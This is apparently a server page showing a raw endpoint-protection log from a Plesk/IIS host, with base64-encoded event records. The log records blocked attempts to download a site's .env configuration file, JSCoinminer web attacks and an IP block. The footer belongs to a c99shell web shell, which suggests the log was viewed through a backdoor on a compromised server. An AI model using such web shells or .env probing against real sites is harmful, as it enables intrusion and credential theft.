RDVBMTJGN0EyIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3MzA1NjI2MTcwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo2ODI4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDE5OTcwOTU2LCJ1aWQiOiI2NUYzMDAwMS0wMDBFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMjA2NiwibmFtZSI6IkF1ZGl0OiBFbnZpcm9ubWVudCBDb25maWcgRmlsZSBEb3dubG9hZCBBdHRlbXB0Iiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00007d42	00010000	00000002	00000002	0000cd7c	00002eb2	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://khodienmayhc.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		F857598D4FD830F36D251FBB6011873904154A46CA8885DF84963CF380A7CA66	00000000	00000000	
00000213	01dc945f87254f8e	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc945f8594c2d4	01dc9460eb357ed4	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 11:18:09 PM to 2/2/2026 11:28:09 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc945fabb55845	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc945f852715cd	01dc945f852715cd	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM0MDIwLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQ4ODQ1NDI0LCJ1aWQiOiJDODU4RjY5Qi0wMDUwLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI4NTI2QTRBNS05NDVGLTExRjEtOUUwMy04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000ed99	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770049074.5183990001678466796875			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
																																																																																																																																																																																														

:: Command execute ::

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5358 ]--